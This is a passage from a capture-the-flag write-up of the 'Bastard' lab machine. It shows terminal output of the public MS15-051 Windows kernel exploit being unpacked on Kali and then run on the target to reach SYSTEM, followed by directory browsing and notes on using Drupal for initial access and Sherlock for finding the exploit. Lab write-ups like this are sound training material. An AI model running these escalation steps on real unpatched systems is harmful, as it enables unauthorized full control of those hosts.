inflating: MS15-051-KB3045171/ms15-051x64.exe
creating: MS15-051-KB3045171/Source/
creating: MS15-051-KB3045171/Source/ms15-051/
inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.cpp
inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj
inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj.filters
inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj.user
inflating: MS15-051-KB3045171/Source/ms15-051/ntdll.lib
inflating: MS15-051-KB3045171/Source/ms15-051/ntdll64.lib
inflating: MS15-051-KB3045171/Source/ms15-051/ReadMe.txt
creating: MS15-051-KB3045171/Source/ms15-051/Win32/
inflating: MS15-051-KB3045171/Source/ms15-051/Win32/ms15-051.exe
creating: MS15-051-KB3045171/Source/ms15-051/x64/
inflating: MS15-051-KB3045171/Source/ms15-051/x64/ms15-051x64.exe
inflating: MS15-051-KB3045171/Source/ms15-051.sln
inflating: MS15-051-KB3045171/Source/ms15-051.suo
┌──(rocky㉿kali)-[/opt]
└─$ cd MS15-051-KB3045171
┌──(rocky㉿kali)-[/opt/MS15-051-KB3045171]
└─$ ls
ms15-051.exe ms15-051x64.exe Source
┌──(rocky㉿kali)-[/opt/MS15-051-KB3045171]
└─$ sudo cp ms15-051x64.exe ~/hckbox/Bastard
Privielege escalation to SYSTEM
PS C:\temp> .\ms15-051x64.exe "whoami"
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 3032 created.
==============================
nt authority\system
PS C:\temp> cd c:/
PS C:\> cd users
PS C:\users> dir
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 19/3/2017 1:20 ?? Administrator
d---- 19/3/2017 1:54 ?? Classic .NET AppPool
d---- 19/3/2017 7:35 ?? dimitris
d-r-- 14/7/2009 7:57 ?? Public
PS C:\users> cd Administrator
PS C:\users\Administrator> ls
Key Takeaways Link to heading
The initial shell was obtained with Drupal vulnarability. I was thinking i can use juicypotato exploit and i have seen many others was able to do privilege escalation with this. I tried for 2 days mutiple time and even did reset of machine. Still could not do it. Then I have used sherlock PRIV escalation script to find the right exploit. Ms-15-051 is an exploit which can be applicable to most of windows where no hotfix installed. We have got this idea that the machine dont have any hotfix installed. I could directly gone for ms-15-051 the moment i saw no hotfix installed. However I was working to get the juicypotato explot make work. Finally I have decided to go for ms-15-051.